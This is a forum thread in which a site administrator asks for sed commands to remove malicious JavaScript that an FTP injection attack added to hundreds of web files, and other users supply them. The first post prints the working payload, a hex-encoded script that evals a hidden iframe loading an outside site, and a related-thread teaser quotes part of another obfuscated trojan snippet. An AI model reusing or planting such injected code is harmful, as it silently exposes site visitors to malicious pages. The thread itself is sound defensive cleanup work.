Remove java code from multiple files


 
Thread Tools Search this Thread
Top Forums Shell Programming and Scripting Remove java code from multiple files
# 1  
Old 10-17-2011
Remove java code from multiple files

Hello,

We have a client who has had an FTP injection attack on their account. Over 600 files have this code added to the files:

Code:
<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f6578706c6f726574726176656c6e757273696e672e636f6d2f6e6577732e7068703f74703d66646661336165353965343464313930222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>

::sorry, may make you scroll to the right::

I am looking for a sed (or other command) that will find this string and remove it..

Some code I have tried:

grep -rl 646f63756d6 * | xargs sed -i '/<script/,/<\/script>/d'

That one is real close.. But, it removes everything after <script... So, if there is any data after the </script>, it gets removed too.. So, I think it just needs some tweaking...

Thanks for any help!

David

---------- Post updated at 12:50 AM ---------- Previous update was at 12:00 AM ----------

Hello,

I see that my first code won't work, that is meant for deleting a complete line, but sometimes there is valid code at the beginning of the line (like </html>).

So, I think I need the properly formatted find/replace command (s///). I can't seem to come up with the proper find piece.

Thanks,
David
# 2  
Old 10-17-2011
sed

Hi,

you want to remove only the contents within <script> and </script> right?

Cheers,
RangaSmilie
# 3  
Old 10-17-2011
Hello,

The entire statement needs to be removed, including the <script> and </script>.

Thanks,
David
# 4  
Old 10-17-2011
sed

Hi,

Try this one,,

Code:
sed 's#\(.*\)<script>\(.*\)</script>\(.*\)#\1\3#' sample.txt

here sample.txt is the input file..

Cheers,
RangaSmilie
This User Gave Thanks to rangarasan For This Post:
# 5  
Old 10-17-2011
Hello,

I think that did the trick! I used:
Code:
grep -rl 646f63756d6 * | sed 's/ /\ /g' | xargs sed -i 's#\(.*\)<script>\(.*\)</script>\(.*\)#\1\3#'

to replace a number of files in a test directory.

Thanks much!
David

Last edited by Franklin52; 10-17-2011 at 03:43 AM.. Reason: Please use code tags, thank you
# 6  
Old 10-17-2011
sed

FineSmilie
# 7  
Old 10-20-2011
Hello,

Had another situation occur that was about the same as this one, except the javascript is across multiple lines (vs all on the same line like my first issue). I did get those files cleaned up, thanks again rangarasan.

This one goes more like this:

<script>^M
function vdch () {^M
..
..
..
</script>

each line ends with the ^M character, so that will probably affect the command a bit.

Is there a sed variant of the one presented that would support multiple lines of this nature?

Thanks!
David
Login or Register to Ask a Question

Previous Thread | Next Thread

10 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

[Solved] How to remove multiple files?

Hi Gurus, I have below files in one directory. the file name has date and time portion which is exactly the file be created. I need keep only lasted created file which is abc_20140101_1550 and remove rest of the file. abc_20140101_1300 abc_20140101_1200 abc_20140101_1400 abc_20140101_1500... (2 Replies)
Discussion started by: ken6503
2 Replies

2. Shell Programming and Scripting

How to remove hidden backslash in multiple files?

Hi I have around 300 files in a folder. When I type ls -l I see the following Mouse.chr10_+_:101862321-101863928.maf Mouse.chr10_+_:101862322-101863928.maf Mouse.chr10_+_:101862323-101863928.maf But when I run my scripts, they couldn't recognise the filename because of hidden backslash like... (5 Replies)
Discussion started by: quincyjones
5 Replies

3. Shell Programming and Scripting

how to remove hacking code from multiple files

Hello, I've located with clamav multiple .js files infected at the end with the above (JS.Trojan.Redir-3) code var _0x4470=;eval(function (_0xa064x1,_0xa064x2,_0xa064x3, _0xa064x4,_0xa064x5,_0xa064x6){_0xa064x5=function (_0xa064x3){return _0xa064x3.toString(36);}... (6 Replies)
Discussion started by: MaRiOsGR
6 Replies

4. Programming

can i have an optimal solution for this java code ? Facing Java heap space problem even at 3GB heaps

My desired output is run: for this 1 for this 2 for this 3 for this 4 for this 5 for this 1,2 1->2 for this 2,3 2->3 for this 3,4 3->4 for this 4,5 4->5 for this 1,2,3 1->2,3 (2 Replies)
Discussion started by: vaibhavkorde
2 Replies

5. UNIX for Dummies Questions & Answers

How to remove characters from multiple .txt files

Friends, I want to remove charecters from multiple .txt files. Foe example : In this .txt files there are many "ctrl m" present in last of each line in one .txt file. I want to remove "ctrl m" from each line from all .txt files. Need your help regarding this. (4 Replies)
Discussion started by: meetsubhas
4 Replies

6. Shell Programming and Scripting

To remove multiple files in FTP

We have a files in FTP server..... after getting the files from FTP by mget *.* i hav to remove all files (multiple files) at once... is there any command to delete multiple files at once (2 Replies)
Discussion started by: nani1984
2 Replies

7. Programming

Need an c,c++,or java code for parsing the log files

need the code for c,c++,java for parsing the log file (5 Replies)
Discussion started by: raghuraipur
5 Replies

8. Shell Programming and Scripting

return code of multiple java process

Hi, I have a unix shell script which is launching multiple java processes by calling a java class in a loop, but each time with a different set of parameters. Now I have to use the return code from each process in the script later. but how do i obtain the return code from each process... (1 Reply)
Discussion started by: rama354
1 Replies

9. Shell Programming and Scripting

How to remove certain lines in multiple txt files?

Hi , I have this type of files:- BGH.28OCT2008.00000001.433155.001 BGH.28OCT2008.00000002.1552361.001 BGH.28OCT2008.00000003.1438355.001 BGH.28OCT2008.00000004.1562602.001 Inside them contains the below: 5Discounts 6P150 - Max Total Usage RM150|-221.00 P150 EPP - Talktime RM150... (5 Replies)
Discussion started by: olloong
5 Replies

10. Shell Programming and Scripting

read list of filenames from text file and remove these files in multiple directories

I have a large list of filenames from an Excel sheet, which I then translate into a simple text file. I'd like to use this list, which contains various file extensions , to archive these files and then remove them recursively through multiple directories and subdirectories. So far, it looks like... (5 Replies)
Discussion started by: fxvisions
5 Replies
Login or Register to Ask a Question